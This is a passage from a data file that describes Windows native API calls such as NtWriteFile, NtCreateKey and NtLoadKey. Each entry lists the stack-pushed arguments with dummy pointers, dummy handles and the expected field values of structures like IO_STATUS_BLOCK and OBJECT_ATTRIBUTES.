"fieldValue": "0x00000000", "fieldComment": "Number of bytes transferred (initial value)" } ] } } }, "NtReadFileScatter": { "ntFunc": "NtReadFileScatter", "pushes": [ { "value": "0x00000000", "additionalComment": "PULONG Key (None, not used for synchronous I/O)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER ByteOffset (None, read from current file position)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000200", "additionalComment": "ULONG Length (512 bytes to read)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "FILE_SEGMENT_ELEMENT SegmentArray (dummy pointer to segment array)", "structurePointer": "FILE_SEGMENT_ELEMENT", "structureRef": "struct171", "structureValueExpectations": "Array of segment elements for scatter read.", "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct172", "structureValueExpectations": "Status and information fields for I/O result.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None, no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None, synchronous operation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct171": { "type": "FILE_SEGMENT_ELEMENT", "fields": [ { "fieldName": "Buffer", "fieldType": "PVOID", "fieldValue": "0xbadd00a0", "fieldComment": "Dummy pointer to segment buffer" } ] }, "struct172": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Number of bytes transferred (initial value)" } ] } } }, "NtSetEaFile": { "ntFunc": "NtSetEaFile", "pushes": [ { "value": "0x00000020", "additionalComment": "ULONG EaBufferSize (32 bytes, typical small EA buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "PVOID EaBuffer (dummy pointer to EA buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct173", "structureValueExpectations": "Status and information fields for I/O result.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct173": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Number of bytes transferred (initial value)" } ] } } }, "NtSetInformationFile": { "ntFunc": "NtSetInformationFile", "pushes": [ { "value": "0x00000010", "additionalComment": "FileInformationClass: FileDispositionInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000008", "additionalComment": "Length: 8 bytes (typical for FILE_DISPOSITION_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to FILE_DISPOSITION_INFORMATION (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0010", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct174", "structureValueExpectations": "Status and Information fields.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct174": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (success)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000008", "fieldComment": "Number of bytes processed" } ] } } }, "NtSetVolumeInformationFile": { "ntFunc": "NtSetVolumeInformationFile", "pushes": [ { "value": "0x00000001", "additionalComment": "FileSystemInformationClass: FileFsLabelInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000020", "additionalComment": "Length: 32 bytes (typical for FS label info)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to FILE_FS_LABEL_INFORMATION (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0070" }, { "value": "0xbadd0030", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct175", "structureValueExpectations": "Status and Information fields.", "pointedValue": None }, { "value": "0x00000445", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct175": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (success)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000020", "fieldComment": "Number of bytes processed" } ] } } }, "NtUnlockFile": { "ntFunc": "NtUnlockFile", "pushes": [ { "value": "0x00000000", "additionalComment": "Key: 0 (no key used)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to LARGE_INTEGER Length (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct176", "structureValueExpectations": "Length of region to unlock.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to LARGE_INTEGER ByteOffset (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct177", "structureValueExpectations": "Starting offset of region to unlock.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct178", "structureValueExpectations": "Status and Information fields.", "pointedValue": None }, { "value": "0x00000446", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct176": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000001000", "fieldComment": "Length: 4096 bytes" } ] }, "struct177": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "Offset: start of file" } ] }, "struct178": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (success)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00001000", "fieldComment": "Number of bytes processed" } ] } } }, "NtWriteFile": { "ntFunc": "NtWriteFile", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to ULONG Key (dummy pointer, optional, usually None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0080", "additionalComment": "Pointer to LARGE_INTEGER ByteOffset (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct179", "structureValueExpectations": "Offset in file to write.", "pointedValue": None }, { "value": "0x00000010", "additionalComment": "Length: 16 bytes", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd00a0" }, { "value": "0xbadd00b0", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct180", "structureValueExpectations": "Status and Information fields.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ApcContext: None (no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ApcRoutine: None (no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Event: None (no event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000447", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct179": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000020", "fieldComment": "Offset: 32 bytes into file" } ] }, "struct180": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (success)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000010", "fieldComment": "Number of bytes written" } ] } } }, "NtWriteFileGather": { "ntFunc": "NtWriteFileGather", "pushes": [ { "value": "0xbadd00c0", "additionalComment": "Pointer to ULONG Key (dummy pointer, optional, usually None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd00d0", "additionalComment": "Pointer to LARGE_INTEGER ByteOffset (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct181", "structureValueExpectations": "Offset in file to write.", "pointedValue": None }, { "value": "0x00000020", "additionalComment": "Length: 32 bytes", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to FILE_SEGMENT_ELEMENT array (dummy pointer)", "structurePointer": "FILE_SEGMENT_ELEMENT", "structureRef": "struct182", "structureValueExpectations": "Array of segment elements for scatter/gather I/O.", "pointedValue": None }, { "value": "0xbadd00f0", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct183", "structureValueExpectations": "Status and Information fields.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ApcContext: None (no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ApcRoutine: None (no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Event: None (no event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000448", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct181": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000040", "fieldComment": "Offset: 64 bytes into file" } ] }, "struct182": { "type": "FILE_SEGMENT_ELEMENT", "fields": [ { "fieldName": "Buffer", "fieldType": "PVOID", "fieldValue": "0xbadd0100", "fieldComment": "Pointer to buffer segment (dummy pointer)" } ] }, "struct183": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (success)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000020", "fieldComment": "Number of bytes written" } ] } } }, "NtCreateIoCompletion": { "ntFunc": "NtCreateIoCompletion", "pushes": [ { "value": "0x00000004", "additionalComment": "ULONG NumberOfConcurrentThreads (default: 4)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, typical for unnamed completion port)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "ACCESS_MASK DesiredAccess (IO_COMPLETION_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PHANDLE IoCompletionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtOpenIoCompletion": { "ntFunc": "NtOpenIoCompletion", "pushes": [ { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, typical for unnamed completion port)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "ACCESS_MASK DesiredAccess (IO_COMPLETION_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PHANDLE IoCompletionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtQueryIoCompletion": { "ntFunc": "NtQueryIoCompletion", "pushes": [ { "value": "0xbadd0020", "additionalComment": "PULONG RequiredLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000020", "additionalComment": "ULONG InformationBufferLength (32 bytes, typical for IO_COMPLETION_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PVOID IoCompletionInformation (dummy pointer to output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "IO_COMPLETION_INFORMATION_CLASS InformationClass (IoCompletionBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE IoCompletionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRemoveIoCompletion": { "ntFunc": "NtRemoveIoCompletion", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER Timeout (None, wait indefinitely)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0050", "additionalComment": "PULONG CompletionValue (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0060", "additionalComment": "PULONG CompletionKey (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000444", "additionalComment": "HANDLE IoCompletionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCompactKeys": { "ntFunc": "NtCompactKeys", "pushes": [ { "value": "0xbadd0070", "additionalComment": "HANDLE KeysArray[] (dummy pointer to array of handles)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00004444" }, { "value": "0x00000002", "additionalComment": "ULONG NrOfKeys (2 keys in array)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCompressKey": { "ntFunc": "NtCompressKey", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE Key (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateKey": { "ntFunc": "NtCreateKey", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG Disposition (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000020", "additionalComment": "CreateOptions (REG_OPTION_NON_VOLATILE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to UNICODE_STRING Class (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct184", "structureValueExpectations": "UNICODE_STRING describing the class of the key, often None.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "TitleIndex (usually 0, reserved)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct185", "structureValueExpectations": "Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.", "pointedValue": None }, { "value": "0x000f003f", "additionalComment": "DesiredAccess (KEY_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE KeyHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct184": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero length (None class)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero max length (None class)" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0x00000000", "fieldComment": "None pointer (no class string)" } ] }, "struct185": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0080", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtDeleteKey": { "ntFunc": "NtDeleteKey", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtDeleteValueKey": { "ntFunc": "NtDeleteValueKey", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to UNICODE_STRING ValueName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct186", "structureValueExpectations": "UNICODE_STRING describing the value name to delete.", "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct186": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "16 bytes (8 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes (16 UTF-16 chars)" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0090", "fieldComment": "Pointer to value name string (dummy pointer)" } ] } } }, "NtEnumerateKey": { "ntFunc": "NtEnumerateKey", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000030" }, { "value": "0x00000100", "additionalComment": "Length (256 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to buffer for KeyInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0070" }, { "value": "0x00000002", "additionalComment": "KeyInformationClass (KeyNodeInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Index (first key, 0-based)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtEnumerateValueKey": { "ntFunc": "NtEnumerateValueKey", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer, optional out parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000100", "additionalComment": "ULONG Length (256 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to buffer for KeyValueInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0100" }, { "value": "0x00000001", "additionalComment": "KeyValueInformationClass = KeyValueFullInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Index (first value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFlushKey": { "ntFunc": "NtFlushKey", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtLoadKey": { "ntFunc": "NtLoadKey", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to OBJECT_ATTRIBUTES HiveFileName (dummy pointer, typically non-None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct187", "structureValueExpectations": "Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES DestinationKeyName (dummy pointer, typically non-None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct188", "structureValueExpectations": "Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": { "struct187": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00a0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] }, "struct188": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00b0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtLoadKey2": { "ntFunc": "NtLoadKey2", "pushes": [ { "value": "0x00000001", "additionalComment": "Flags (e.g., REG_NO_LAZY_FLUSH)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to OBJECT_ATTRIBUTES HiveFileName (dummy pointer, typically non-None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct189", "structureValueExpectations": "Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES DestinationKeyName (dummy pointer, typically non-None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct190", "structureValueExpectations": "Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": { "struct189": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00c0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] }, "struct190": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00d0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtNotifyChangeKey": { "ntFunc": "NtNotifyChangeKey", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN Asynchronous (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000100", "additionalComment": "ULONG RegChangesDataBufferLength (256 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to RegChangesDataBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0200" }, { "value": "0x00000001", "additionalComment": "BOOLEAN WatchSubtree (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000010", "additionalComment": "ULONG NotifyFilter (REG_NOTIFY_CHANGE_LAST_SET)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct191", "structureValueExpectations": "Status and Information fields for I/O completion.", "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to ApcRoutineContext (dummy pointer, optional user context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0xbadd0090", "additionalComment": "Pointer to IO_APC_ROUTINE (dummy pointer, optional callback)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0300" }, { "value": "0x0000beef", "additionalComment": "HANDLE EventHandle (dummy handle, optional event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct191": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", 